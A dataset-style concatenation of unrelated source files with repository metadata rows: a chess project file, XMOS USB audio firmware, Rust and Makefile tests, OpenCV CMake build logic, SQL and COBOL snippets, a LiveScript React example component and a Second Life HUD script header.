"$(ECERE_SDK_SRC)/ecere/res/fonts/tahomabd.ttf"
],
"Options" : {
"ExcludeFromBuild" : true
},
"Configurations" : [
{
"Name" : "Emscripten",
"Options" : {
"ExcludeFromBuild" : false
}
}
]
},
"aboutPic.jpg",
"blackBishop.png",
"blackKing.png",
"blackKnight.png",
"blackPawn.png",
"blackQueen.png",
"blackRook.png",
"board.jpg",
"bthr.jpg",
"darkwood.jpg",
"lightwo1.jpg",
"whiteBishop.png",
"whiteKing.png",
"whiteKnight.png",
"whitePawn.png",
"whiteQueen.png",
"whiteRook.png",
"chessSet.3ds"
]
}
| Ecere Projects | 4 | N-eil/ecere-sdk | samples/games/chess/chess.epj | [
"BSD-3-Clause"
] |
/**
* @file audio.xc
* @brief XMOS L1/L2 USB 2.0 Audio Reference Design. Audio Functions.
* @author Ross Owen, XMOS Semiconductor Ltd
*
* This thread handles I2S and forks an additional SPDIF Tx thread in parallel. It forwards samples to the SPDIF Tx thread.
* Additionally this thread handles clocking and CODEC/DAC/ADC config.
**/
#include <syscall.h>
#include <platform.h>
#include <xs1.h>
#include <xclib.h>
#include <xs1_su.h>
#include "devicedefines.h"
#include "dfu_interface.h"
#include "audiohw.h"
#include "commands.h"
#include "xc_ptr.h"
#include "print.h"
/* Two buffers for ADC data to allow for DAC and ADC ports being offset */
static unsigned samplesIn_0[NUM_USB_CHAN_IN];
static unsigned samplesIn_1[I2S_CHANS_ADC];
unsigned g_adcVal = 0;
// TODO: Do we need this?
#ifdef XTA_TIMING_AUDIO
#pragma xta command "add exclusion received_command"
#pragma xta command "analyse path i2s_output_l i2s_output_r"
#pragma xta command "set required - 2000 ns"
#pragma xta command "add exclusion received_command"
#pragma xta command "add exclusion received_underflow"
#pragma xta command "add exclusion divide_1"
#pragma xta command "add exclusion deliver_return"
#pragma xta command "analyse path i2s_output_r i2s_output_l"
#pragma xta command "set required - 2000 ns"
#endif
unsigned dsdMode = DSD_MODE_OFF;
/* Master clock input */
extern port p_mclk_in;
extern clock clk_audio_mclk;
extern void device_reboot(void);
#pragma unsafe arrays
/* Exchange one frame of samples with the mixer/decouple thread over c_out.
 *
 * Protocol: send underflowWord first, then either
 *   - a control token is pending: consume it and return its value
 *     (a command such as a sample-frequency change), or
 *   - receive a handshake word and stream out the ADC/input samples.
 *
 * readBuffNo selects which of the two ADC buffers to send; samplesIn_0 and
 * samplesIn_1 exist because the DAC and ADC ports are offset by one sample.
 *
 * Returns: the received command token, or 0 for a normal sample exchange.
 */
static inline unsigned DoSampleTransfer(chanend c_out, const int readBuffNo, const unsigned underflowWord)
{
    outuint(c_out, underflowWord);

    /* Check for sample freq change (or other command) or new samples from mixer */
    if(testct(c_out))
    {
        unsigned command = inct(c_out);
#pragma xta endpoint "received_command"
        return command;
    }
    else
    {
        inuint(c_out);

#pragma loop unroll
        for(int i = 0; i < I2S_CHANS_ADC; i++)
        {
            /* Double-buffered I2S ADC channels: send the frame captured last cycle */
            if(readBuffNo)
                outuint(c_out, samplesIn_1[i]);
            else
                outuint(c_out, samplesIn_0[i]);
        }

        /* Send over the digi channels - no odd buffering required */
#pragma loop unroll
        for(int i = I2S_CHANS_ADC; i < NUM_USB_CHAN_IN; i++)
        {
            outuint(c_out, samplesIn_0[i]);
        }
    }
    return 0;
}
/* I2S delivery thread */
#pragma unsafe arrays
/* Main audio delivery loop: collects PCM frames from the PDM->PCM decimator
 * over c_pdm_pcm and forwards them to the mixer via DoSampleTransfer().
 *
 * c_out:      channel to the mixer/decouple thread
 * c_spd_out:  optional channel to an S/PDIF Tx thread (unused in this build)
 * divide:     master-clock divider (unused in this PDM-only build)
 * curSamFreq: current sample frequency in Hz (unused in this PDM-only build)
 * c_pdm_pcm:  channel to the PDM->PCM converter task(s)
 * c_adc:      optional ADC channel (unused in this build)
 *
 * Returns the command token (e.g. sample-rate change) that caused the loop
 * to exit; audio() acts on that value and restarts us.
 */
unsigned static deliver(chanend c_out, chanend ?c_spd_out, unsigned divide, unsigned curSamFreq, chanend c_pdm_pcm, chanend ?c_adc)
{
    /* Since DAC and ADC buffered ports off by one sample we buffer previous ADC frame */
    unsigned readBuffNo = 0;
    unsigned index;
    unsigned underflowWord = 0;
    /* NOTE(review): frameCount is only ever written 0 in this build, so the
     * PDM fetch below runs every iteration - confirm this is intended. */
    unsigned frameCount = 0;

    /* Prime the channel protocol once before entering the main loop */
    unsigned command = DoSampleTransfer(c_out, readBuffNo, underflowWord);

    if(command)
    {
        return command;
    }

    /* Main Audio I/O loop */
    while (1)
    {
        {
            if(frameCount == 0)
            {
                /* Get samples from PDM->PCM converter */
                c_pdm_pcm <: 1;
#pragma loop unroll
                for(int i = 0; i < NUM_PDM_MICS; i++)
                {
                    c_pdm_pcm :> samplesIn_0[i];
                }
            }
            index = 0;
        } // !dsdMode

        {
            /* Do samples transfer */
            /* The below looks a bit odd but forces the compiler to inline twice */
            unsigned command;
            if(readBuffNo)
                command = DoSampleTransfer(c_out, 1, underflowWord);
            else
                command = DoSampleTransfer(c_out, 0, underflowWord);

            if(command)
            {
                return command;
            }

            /* Reset frame counter and flip the ADC buffer */
            frameCount = 0;
            readBuffNo = !readBuffNo;
        }
    }

    /* Unreachable: the while(1) loop above only exits via return */
#pragma xta endpoint "deliver_return"
    return 0;
}
/* This function is a dummy version of the deliver thread that does not
connect to the codec ports. It is used during DFU reset. */
[[distributable]]
void DFUHandler(server interface i_dfu i, chanend ?c_user_cmd);
#pragma select handler
/* Select-handler wrapper around testct(): lets a select statement wait on a
 * pending control token on channel c.  Sets returnVal to 1 if a control
 * token is waiting, 0 otherwise.  (Select handlers cannot return values,
 * hence the by-reference out-parameter.) */
void testct_byref(chanend c, int &returnVal)
{
    returnVal = 0;

    if(testct(c))
        returnVal = 1;
}
[[combinable]]
/* Dummy replacement for deliver() used while real audio is stopped for DFU:
 * keeps the mixer channel protocol alive by answering every exchange with
 * zero samples until a control token arrives.
 *
 * c_out:   channel to the mixer/decouple thread
 * command: out-parameter receiving the control-token value that terminated
 *          the loop.
 */
static void dummy_deliver(chanend c_out, unsigned &command)
{
    int ct;

    while (1)
    {
        select
        {
            /* Check for sample freq change or new samples from mixer*/
            case testct_byref(c_out, ct):
                if(ct)
                {
                    /* BUG FIX: the original declared a fresh local here
                     * ("unsigned command = inct(...)"), shadowing the
                     * reference parameter, so the caller never received the
                     * command token.  Assign to the out-parameter instead. */
                    command = inct(c_out);
                    return;
                }
                else
                {
                    inuint(c_out);

                    /* No audio running: answer with silence */
#pragma loop unroll
                    for(int i = 0; i < NUM_USB_CHAN_IN; i++)
                    {
                        outuint(c_out, 0);
                    }
                }
                outuint(c_out, 0);
                break;
        }
    }
}
#define SAMPLE_RATE 200000
#define NUMBER_CHANNELS 1
#define NUMBER_SAMPLES 100
#define NUMBER_WORDS ((NUMBER_SAMPLES * NUMBER_CHANNELS+1)/2)
#define SAMPLES_PER_PRINT 1
/* Main audio control task: owns master-clock setup and CODEC/ADC/DAC
 * configuration, (re)starts the delivery loop on every sample-rate change
 * and services DFU stop/start requests from the mixer channel.
 *
 * c_mix_out:    channel to mixer/decouple thread
 * c_config:     optional channel for audio hardware configuration
 * c:            optional ADC channel, passed through to deliver()
 * dfuInterface: DFU server interface, serviced while audio is stopped
 * c_pdm_in:     channel to the PDM microphone task(s)
 */
void audio(chanend c_mix_out, chanend ?c_config, chanend ?c, server interface i_dfu dfuInterface, chanend c_pdm_in)
{
    unsigned curSamFreq = DEFAULT_FREQ;
    unsigned curSamRes_DAC = STREAM_FORMAT_OUTPUT_1_RESOLUTION_BITS; /* Default to something reasonable */
    unsigned curSamRes_ADC = STREAM_FORMAT_INPUT_1_RESOLUTION_BITS; /* Default to something reasonable - note, currently this never changes*/
    unsigned command;
    unsigned mClk;
    unsigned divide;
    unsigned firstRun = 1;

    /* Clock master clock-block from master-clock port */
    configure_clock_src(clk_audio_mclk, p_mclk_in);
    start_clock(clk_audio_mclk);

    /* Perform required CODEC/ADC/DAC initialisation */
    AudioHwInit(c_config);

    while(1)
    {
        /* Calculate what master clock we should be using */
        /* NOTE(review): mClk is left unchanged (uninitialised on the first
         * pass) if curSamFreq divides neither MCLK_441 nor MCLK_48 -
         * presumably unreachable for supported rates; confirm. */
        if ((MCLK_441 % curSamFreq) == 0)
        {
            mClk = MCLK_441;
        }
        else if ((MCLK_48 % curSamFreq) == 0)
        {
            mClk = MCLK_48;
        }

        /* Calculate master clock to bit clock (or DSD clock) divide for current sample freq
         * e.g. 11.289600 / (176400 * 64) = 1 */
        {
            /* I2S has 32 bits per sample. *2 as 2 channels */
            unsigned numBits = 64;
            divide = mClk / ( curSamFreq * numBits);
            /* TODO; we should catch and handle the case when divide is 0. Currently design will lock up */
        }

        {
            unsigned curFreq = curSamFreq;
            /* Configure Clocking/CODEC/DAC/ADC for SampleFreq/MClk */
            AudioHwConfig(curFreq, mClk, c_config, dsdMode, curSamRes_DAC, curSamRes_ADC);
        }

        if(!firstRun)
        {
            /* TODO wait for good mclk instead of delay */
            /* No delay for DFU modes */
            /* command was set by deliver() below on the previous iteration */
            if ((curSamFreq != AUDIO_REBOOT_FROM_DFU) && (curSamFreq != AUDIO_STOP_FOR_DFU) && command)
            {
                /* Handshake back */
                outct(c_mix_out, XS1_CT_END);
            }
        }
        firstRun = 0;

        par
        {
            {
                /* Send decimation factor to PDM task(s) */
                c_pdm_in <: curSamFreq;

                /* Run the delivery loop until it returns a command token */
                command = deliver(c_mix_out, null, divide, curSamFreq, c_pdm_in, c);

                if(command == SET_SAMPLE_FREQ)
                {
                    curSamFreq = inuint(c_mix_out);
                }
                else if(command == SET_STREAM_FORMAT_OUT)
                {
                    /* Off = 0
                     * DOP = 1
                     * Native = 2
                     */
                    dsdMode = inuint(c_mix_out);
                    curSamRes_DAC = inuint(c_mix_out);
                }

                /* Currently no more audio will happen after this point */
                if (curSamFreq == AUDIO_STOP_FOR_DFU)
                {
                    /* Handshake, then idle in the dummy delivery loop while
                     * DFU is serviced, until told to restart */
                    outct(c_mix_out, XS1_CT_END);
                    outuint(c_mix_out, 0);

                    while (1)
                    {
                        [[combine]]
                        par
                        {
                            DFUHandler(dfuInterface, null);
                            dummy_deliver(c_mix_out, command);
                        }
                        curSamFreq = inuint(c_mix_out);

                        if (curSamFreq == AUDIO_START_FROM_DFU)
                        {
                            outct(c_mix_out, XS1_CT_END);
                            break;
                        }
                    }
                }

                /* Tell PDM task(s) to stop before reconfiguring */
                c_pdm_in <: 0;
            }
        }
    }
}
| XC | 5 | simongapp/xmos_usb_mems_interface | 01Firmware/PDM_USB/PDM_USB/src/audio.xc | [
"Unlicense"
] |
// run-rustfix
#![feature(in_band_lifetimes)]
#![deny(single_use_lifetimes)]
#![allow(dead_code)]
#![allow(unused_variables)]
// Test that we DO warn when lifetime name is used only
// once in a fn argument, even with in band lifetimes.
fn a(x: &'a u32, y: &'b u32) {
//~^ ERROR `'a` only used once
//~| ERROR `'b` only used once
//~| HELP elide the single-use lifetime
//~| HELP elide the single-use lifetime
}
fn main() { }
| Rust | 4 | Eric-Arellano/rust | src/test/ui/single-use-lifetime/one-use-in-fn-argument-in-band.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
-include ../../run-make-fulldeps/tools.mk

# Regression test for issue #10971
# Running two invocations in parallel would overwrite each other's temp files.
# The two rustc invocations are deliberately run concurrently ('&' plus a line
# continuation puts both in one shell command) with distinct -Z temps-dir
# values; the test passes if neither clobbers the other's temporaries.
all:
	touch $(TMPDIR)/lib.rs
	$(RUSTC) --crate-type=lib -Z temps-dir=$(TMPDIR)/temp1 $(TMPDIR)/lib.rs & \
	$(RUSTC) --crate-type=staticlib -Z temps-dir=$(TMPDIR)/temp2 $(TMPDIR)/lib.rs
| Makefile | 3 | ohno418/rust | src/test/run-make/issue-10971-temps-dir/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
% Runtime smoke test: the directive runs at load time and prints "OK"
% followed by a newline.
:- write('OK'), nl.
"MIT"
] |
---
title: Elements
layout: documentation
doc-tab: elements
hide_tabs: true
hide_pagination: true
breadcrumb:
- home
- documentation
- elements
---
{% include components/links.html category_id='elements' %}
| HTML | 1 | kalpitzeta/bulma | docs/documentation/elements.html | [
"MIT"
] |
# This file is included from a subdirectory
set(PYTHON_SOURCE_DIR "${CMAKE_CURRENT_LIST_DIR}")
ocv_add_module(${MODULE_NAME} BINDINGS PRIVATE_REQUIRED opencv_python_bindings_generator)
include_directories(SYSTEM
"${${PYTHON}_INCLUDE_PATH}"
${${PYTHON}_NUMPY_INCLUDE_DIRS}
)
ocv_module_include_directories(
"${PYTHON_SOURCE_DIR}/src2"
"${OPENCV_PYTHON_BINDINGS_DIR}"
)
# try to use dynamic symbols linking with libpython.so
set(OPENCV_FORCE_PYTHON_LIBS OFF CACHE BOOL "")
string(REPLACE "-Wl,--no-undefined" "" CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS}")
if(NOT WIN32 AND NOT APPLE AND NOT OPENCV_PYTHON_SKIP_LINKER_EXCLUDE_LIBS)
set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} -Wl,--exclude-libs=ALL")
endif()
ocv_add_library(${the_module} MODULE
${PYTHON_SOURCE_DIR}/src2/cv2.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_util.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_numpy.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_convert.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_highgui.cpp
${cv2_generated_hdrs}
${opencv_userdef_hdrs}
${cv2_custom_hdr}
)
if(TARGET gen_opencv_python_source)
add_dependencies(${the_module} gen_opencv_python_source)
endif()
ocv_assert(${PYTHON}_VERSION_MAJOR)
ocv_assert(${PYTHON}_VERSION_MINOR)
if(${PYTHON}_LIMITED_API)
# support only python3.3+
ocv_assert(${PYTHON}_VERSION_MAJOR EQUAL 3 AND ${PYTHON}_VERSION_MINOR GREATER 2)
target_compile_definitions(${the_module} PRIVATE CVPY_DYNAMIC_INIT)
if(WIN32)
string(REPLACE
"python${${PYTHON}_VERSION_MAJOR}${${PYTHON}_VERSION_MINOR}.lib"
"python${${PYTHON}_VERSION_MAJOR}.lib"
${PYTHON}_LIBRARIES
"${${PYTHON}_LIBRARIES}")
endif()
endif()
if(APPLE)
set_target_properties(${the_module} PROPERTIES LINK_FLAGS "-undefined dynamic_lookup")
elseif(WIN32 OR OPENCV_FORCE_PYTHON_LIBS)
if(${PYTHON}_DEBUG_LIBRARIES AND NOT ${PYTHON}_LIBRARIES MATCHES "optimized.*debug")
ocv_target_link_libraries(${the_module} PRIVATE debug ${${PYTHON}_DEBUG_LIBRARIES} optimized ${${PYTHON}_LIBRARIES})
else()
ocv_target_link_libraries(${the_module} PRIVATE ${${PYTHON}_LIBRARIES})
endif()
endif()
if(TARGET gen_opencv_python_source)
set(deps ${OPENCV_MODULE_${the_module}_DEPS})
list(REMOVE_ITEM deps opencv_python_bindings_generator) # don't add dummy module to target_link_libraries list
endif()
ocv_target_link_libraries(${the_module} PRIVATE ${deps})
if(DEFINED ${PYTHON}_CVPY_SUFFIX)
set(CVPY_SUFFIX "${${PYTHON}_CVPY_SUFFIX}")
else()
set(__python_ext_suffix_var "EXT_SUFFIX")
if("${${PYTHON}_VERSION_MAJOR}" STREQUAL "2")
set(__python_ext_suffix_var "SO")
endif()
execute_process(COMMAND ${${PYTHON}_EXECUTABLE} -c "import sysconfig; print(sysconfig.get_config_var('${__python_ext_suffix_var}'))"
RESULT_VARIABLE PYTHON_CVPY_PROCESS
OUTPUT_VARIABLE CVPY_SUFFIX
OUTPUT_STRIP_TRAILING_WHITESPACE)
if(NOT PYTHON_CVPY_PROCESS EQUAL 0)
set(CVPY_SUFFIX ".so")
endif()
if(${PYTHON}_LIMITED_API)
if(WIN32)
string(REGEX REPLACE "\\.[^\\.]*\\." "." CVPY_SUFFIX "${CVPY_SUFFIX}")
else()
string(REGEX REPLACE "\\.[^\\.]*\\." ".abi${${PYTHON}_VERSION_MAJOR}." CVPY_SUFFIX "${CVPY_SUFFIX}")
endif()
endif()
endif()
ocv_update(OPENCV_PYTHON_EXTENSION_BUILD_PATH "${LIBRARY_OUTPUT_PATH}/${MODULE_INSTALL_SUBDIR}")
set_target_properties(${the_module} PROPERTIES
LIBRARY_OUTPUT_DIRECTORY "${OPENCV_PYTHON_EXTENSION_BUILD_PATH}"
ARCHIVE_OUTPUT_NAME ${the_module} # prevent name conflict for python2/3 outputs
PREFIX ""
OUTPUT_NAME cv2
SUFFIX "${CVPY_SUFFIX}")
if(ENABLE_SOLUTION_FOLDERS)
set_target_properties(${the_module} PROPERTIES FOLDER "bindings")
endif()
if(MSVC)
add_definitions(-DCVAPI_EXPORTS)
endif()
if((CV_GCC OR CV_CLANG) AND NOT ENABLE_NOISY_WARNINGS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-unused-function")
endif()
if(MSVC AND NOT ENABLE_NOISY_WARNINGS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4100") #unreferenced formal parameter
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4127") #conditional expression is constant
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4505") #unreferenced local function has been removed
string(REPLACE "/W4" "/W3" CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS}")
endif()
if(MSVC)
ocv_warnings_disable(CMAKE_CXX_FLAGS /wd4996)
else()
ocv_warnings_disable(CMAKE_CXX_FLAGS
-Wdeprecated-declarations
-Woverloaded-virtual -Wunused-private-field
-Wundef # accurate guard via #pragma doesn't work (C++ preprocessor doesn't handle #pragma)
)
endif()
if(MSVC AND NOT BUILD_SHARED_LIBS)
set_target_properties(${the_module} PROPERTIES LINK_FLAGS "/NODEFAULTLIB:atlthunk.lib /NODEFAULTLIB:atlsd.lib /DEBUG")
endif()
if(MSVC AND NOT ${PYTHON}_DEBUG_LIBRARIES)
set(PYTHON_INSTALL_CONFIGURATIONS CONFIGURATIONS Release)
else()
set(PYTHON_INSTALL_CONFIGURATIONS "")
endif()
if(WIN32)
set(PYTHON_INSTALL_ARCHIVE "")
else()
set(PYTHON_INSTALL_ARCHIVE ARCHIVE DESTINATION ${${PYTHON}_PACKAGES_PATH} COMPONENT python)
endif()
set(__python_loader_subdir "")
if(NOT OPENCV_SKIP_PYTHON_LOADER)
set(__python_loader_subdir "cv2/")
endif()
if(NOT " ${PYTHON}" STREQUAL " PYTHON"
AND NOT DEFINED OPENCV_PYTHON_INSTALL_PATH
)
if(DEFINED OPENCV_${PYTHON}_INSTALL_PATH)
set(OPENCV_PYTHON_INSTALL_PATH "${OPENCV_${PYTHON}_INSTALL_PATH}")
elseif(NOT OPENCV_SKIP_PYTHON_LOADER)
set(OPENCV_PYTHON_INSTALL_PATH "${${PYTHON}_PACKAGES_PATH}")
endif()
endif()
if(NOT OPENCV_SKIP_PYTHON_LOADER AND DEFINED OPENCV_PYTHON_INSTALL_PATH)
include("${CMAKE_CURRENT_LIST_DIR}/python_loader.cmake")
set(OPENCV_PYTHON_INSTALL_PATH_SETUPVARS "${OPENCV_PYTHON_INSTALL_PATH}" CACHE INTERNAL "")
endif()
if(OPENCV_SKIP_PYTHON_LOADER)
if(DEFINED OPENCV_${PYTHON}_INSTALL_PATH)
set(__python_binary_install_path "${OPENCV_${PYTHON}_INSTALL_PATH}")
elseif(DEFINED ${PYTHON}_PACKAGES_PATH)
set(__python_binary_install_path "${${PYTHON}_PACKAGES_PATH}")
else()
message(FATAL_ERROR "Specify 'OPENCV_${PYTHON}_INSTALL_PATH' variable")
endif()
else()
ocv_assert(DEFINED OPENCV_PYTHON_INSTALL_PATH)
if(${PYTHON}_LIMITED_API)
set(__python_binary_subdir "python-${${PYTHON}_VERSION_MAJOR}")
else()
set(__python_binary_subdir "python-${${PYTHON}_VERSION_MAJOR}.${${PYTHON}_VERSION_MINOR}")
endif()
set(__python_binary_install_path "${OPENCV_PYTHON_INSTALL_PATH}/${__python_loader_subdir}${__python_binary_subdir}")
endif()
install(TARGETS ${the_module}
${PYTHON_INSTALL_CONFIGURATIONS}
RUNTIME DESTINATION "${__python_binary_install_path}" COMPONENT python
LIBRARY DESTINATION "${__python_binary_install_path}" COMPONENT python
${PYTHON_INSTALL_ARCHIVE}
)
set(__INSTALL_PATH_${PYTHON} "${__python_binary_install_path}" CACHE INTERNAL "") # CMake status
if(NOT OPENCV_SKIP_PYTHON_LOADER)
ocv_assert(DEFINED OPENCV_PYTHON_INSTALL_PATH)
if(OpenCV_FOUND)
set(__loader_path "${OpenCV_BINARY_DIR}/python_loader")
else()
set(__loader_path "${CMAKE_BINARY_DIR}/python_loader")
endif()
set(__python_loader_install_tmp_path "${CMAKE_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/install/python_loader/")
set(OpenCV_PYTHON_LOADER_FULL_INSTALL_PATH "${CMAKE_INSTALL_PREFIX}/${OPENCV_PYTHON_INSTALL_PATH}/cv2")
if(IS_ABSOLUTE "${OPENCV_PYTHON_INSTALL_PATH}")
set(CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE "'${OPENCV_PYTHON_INSTALL_PATH}/cv2'")
else()
set(CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE "LOADER_DIR")
endif()
if(DEFINED ${PYTHON}_VERSION_MINOR AND NOT ${PYTHON}_LIMITED_API)
set(__target_config "config-${${PYTHON}_VERSION_MAJOR}.${${PYTHON}_VERSION_MINOR}.py")
else()
set(__target_config "config-${${PYTHON}_VERSION_MAJOR}.py")
endif()
if(CMAKE_GENERATOR MATCHES "Visual Studio")
set(CMAKE_PYTHON_EXTENSION_PATH "'${OPENCV_PYTHON_EXTENSION_BUILD_PATH}/Release'") # TODO: CMAKE_BUILD_TYPE is not defined
else()
set(CMAKE_PYTHON_EXTENSION_PATH "'${OPENCV_PYTHON_EXTENSION_BUILD_PATH}'")
endif()
configure_file("${PYTHON_SOURCE_DIR}/package/template/config-x.y.py.in" "${__loader_path}/cv2/${__target_config}" @ONLY)
# Decide how the Python loader's config file locates the compiled extension:
# an absolute install path is embedded verbatim; a relative one is rebased
# onto the loader directory at runtime.
# BUG FIX: IS_ABSOLUTE tests the given *value*, so the variable must be
# dereferenced (as done for OPENCV_PYTHON_INSTALL_PATH earlier in this file);
# the original tested the literal string "__python_binary_install_path",
# which is never an absolute path, so the else() branch always ran.
if(IS_ABSOLUTE "${__python_binary_install_path}")
  set(CMAKE_PYTHON_EXTENSION_PATH "'${__python_binary_install_path}'")
else()
  file(RELATIVE_PATH OpenCV_PYTHON_BINARY_RELATIVE_INSTALL_PATH "${OpenCV_PYTHON_LOADER_FULL_INSTALL_PATH}" "${CMAKE_INSTALL_PREFIX}/${__python_binary_install_path}")
  set(CMAKE_PYTHON_EXTENSION_PATH "os.path.join(${CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE}, '${OpenCV_PYTHON_BINARY_RELATIVE_INSTALL_PATH}')")
endif()
configure_file("${PYTHON_SOURCE_DIR}/package/template/config-x.y.py.in" "${__python_loader_install_tmp_path}/cv2/${__target_config}" @ONLY)
install(FILES "${__python_loader_install_tmp_path}/cv2/${__target_config}" DESTINATION "${OPENCV_PYTHON_INSTALL_PATH}/cv2/" COMPONENT python)
endif() # NOT OPENCV_SKIP_PYTHON_LOADER
unset(PYTHON_SRC_DIR)
unset(PYTHON_CVPY_PROCESS)
unset(CVPY_SUFFIX)
unset(PYTHON_INSTALL_CONFIGURATIONS)
unset(PYTHON_INSTALL_ARCHIVE)
| CMake | 3 | yash112-lang/opencv | modules/python/common.cmake | [
"Apache-2.0"
] |
manifest.impl.vendor=JetBrains
manifest.impl.attribute.kotlin.version=Kotlin-Version
manifest.impl.attribute.kotlin.runtime.component=Kotlin-Runtime-Component
# suppress inspection "UnusedProperty" (Used reflectively in JvmRuntimeVersionsConsistencyChecker)
manifest.impl.value.kotlin.runtime.component.core=Core
manifest.impl.value.kotlin.runtime.component.main=Main
manifest.impl.title.kotlin.compiler=Kotlin Compiler
manifest.impl.title.kotlin.compiler.sources=Kotlin Compiler Sources
manifest.impl.title.kotlin.javascript.stdlib=Kotlin JavaScript StdLib | INI | 1 | qussarah/declare | resources/kotlinManifest.properties | [
"Apache-2.0"
] |
-- binary type
select x'00' < x'0f';
select x'00' < x'ff';
-- trim string to numeric
select '1 ' = 1Y;
select '\t1 ' = 1Y;
select '1 ' = 1S;
select '1 ' = 1;
select ' 1' = 1L;
select ' 1' = cast(1.0 as float);
select ' 1.0 ' = 1.0D;
select ' 1.0 ' = 1.0BD; | SQL | 2 | OlegPt/spark | sql/core/src/test/resources/sql-tests/inputs/comparator.sql | [
"Apache-2.0"
] |
01 COMPANY-DETAILS.
05 SEGMENT-ID PIC X(5).
05 COMPANY-ID PIC X(10).
05 STATIC-DETAILS.
10 COMPANY-NAME PIC X(15).
10 ADDRESS PIC X(25).
10 TAXPAYER.
15 TAXPAYER-TYPE PIC X(1).
15 TAXPAYER-STR PIC X(8).
15 TAXPAYER-NUM REDEFINES TAXPAYER-STR
PIC 9(8) COMP.
10 STRATEGY.
15 STRATEGY_DETAIL OCCURS 6.
25 NUM1 PIC 9(7) COMP.
25 NUM2 PIC 9(7) COMP-3.
| COBOL | 3 | gryphus-lab/kafka-connect-fs | src/test/resources/file/reader/data/cobol/companies.cpy | [
"Apache-2.0"
] |
{filter, find, map, pairs-to-obj} = require \prelude-ls
{create-factory}:React = require \react
{div, span} = require \react-dom-factories
{find-DOM-node} = require \react-dom
AceEditor = create-factory require \./AceEditor.ls
{debounce} = require \underscore
create-react-class = require \create-react-class
module.exports = create-react-class do
display-name: \Example
# get-default-props :: a -> Props
# Default prop values for the Example component.  Callers normally supply
# height, initial-language and a non-empty languages list.
get-default-props: ->
    # height :: Int
    # initial-language :: String
    languages: [] # :: [Language], where Language :: {id :: String, name :: String, initial-content :: String, compile :: String -> String}
    style: {}
# render :: a -> VirtualDOMElement
render: ->
div do
class-name: \example
style: @props.style
div class-name: \title, @props.title
div class-name: \description, @props.description
div null,
# TAB CONTAINER
div class-name: \tab-container,
# TABS (one for each language)
div class-name: \languages,
@props.languages |> map ({id, name}) ~>
div do
key: id
class-name: if id == @state.language then \selected else ''
on-click: ~>
<~ @set-state language: id
@execute!
"#{name}#{if id == @state.language then ' - live editor' else ''}"
# CODE EDITOR
AceEditor do
editor-id: @.props.title.replace /\s/g, '' .to-lower-case! .trim!
class-name: \editor
width: @props.width
height: @props.height
mode: "ace/mode/#{@state.language}"
value: @state[@state.language]
on-change: (value) ~>
<~ @set-state {"#{@state.language}" : value}
@debounced-execute!
commands:
* name: \execute
exec: ~> @.execute!
bind-key:
mac: "cmd-enter"
win: "ctrl-enter"
...
# ERROR (compilation & runtime)
if !!@state.err
div class-name: \error, @state.err
# OUTPUT
else
div do
class-name: \output
ref: \output
# get-initial-state :: a -> UIState
get-initial-state: ->
@props.languages
|> map ({id, initial-content}) -> [id, initial-content]
|> pairs-to-obj
|> ~> it <<<
component: undefined
err: undefined
language: @props.initial-language
# execute :: a -> Void
execute: !->
{on-execute}? = @props.languages |> find ~> it.id == @state.language
<~ @set-state err: undefined
# compile
try
on-execute @state[@state.language], find-DOM-node @refs.output
catch err
@set-state err: err.to-string!
# component-did-mount :: a -> Void
component-did-mount: !->
@execute!
@debounced-execute = debounce @.execute, 600 | LiveScript | 5 | rodcope1/react-selectize-rodcope1 | public/components/Example.ls | [
"Apache-2.0"
] |
//*********************************************************************************
//** This program is free software: you can redistribute it and/or modify
//** it under the terms of the GNU Affero General Public License as
//** published by the Free Software Foundation, either version 3 of the
//** License, or (at your option) any later version.
//**
//** This program is distributed in the hope that it will be useful,
//** but WITHOUT ANY WARRANTY; without even the implied warranty of
//** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
//** GNU Affero General Public License for more details.
//**
//** You should have received a copy of the GNU Affero General Public License
//** along with this program. If not, see <https://www.gnu.org/licenses/>
//*********************************************************************************
// ss-c 31Dec2018 <seriesumei@avimail.org> - Combined HUD
// ss-d 03Jan2019 <seriesumei@avimail.org> - Add skin panel
// ss-e 10Feb2019 <seriesumei@avimail.org> - Add option panel
// ss-f 31Mar2019 <seriesumei@avimail.org> - Fix textures for SL vs OpenSim
// ss-g 02Apr2019 <seriesumei@avimail.org> - Add skin buttons and tweak textures
// This builds a multi-paned HUD for Ruth/Roth that includes the existing
// alpha HUD mesh and adds panes for a different skin applier than Shin's
// and an Options pane that currently has fingernail shape/color and toenail
// color buttons.
//
// To build the 'uniHUD' from scratch you will need to:
// * Upload or obtain via whatever means the Alpha HUD mesh and the 'doll'
// mesh. This script will throw an error if you start with a pre-linked
// alpha HUD but it should work anyway. To prepare the alpha hud and doll
// meshes:
// * Remove all scripts
// * Make sure that the 'rotatebar' link is the root of the HUD linkset and
// the 'chest' link is the root of the doll linkset. Thse are used for
// positioning, even so SL gets the positioning wrong compares to OpenSim.
// * Create a new empty box prim named 'Object' and take a copy of it into
// inventory
// * Copy the folloing objects into the new box's inventory on the ground:
// * the new box from inventory created above and name it 'Object'
// * the alpha HUD mesh and name it 'alpha-hud'
// * if the doll mes is not already linked into the alpha HUD linkset copy
// it and name it 'doll'
// * the button meshes named '2x1 button' and 5x button'
// * this script
// * Light fuse (touch the box prim) and get away, the new HUD will be
// assembled around the box prim which will become the root prim of the HUD.
// * The alpha HUD and the doll will not be linked as they may need size
// and/or position adjustments depending on how your mesh is linked. Since
// they are both linksets you do not want to link them to the main HUD until
// you are very satisfied with their position. Then link them and rejoice.
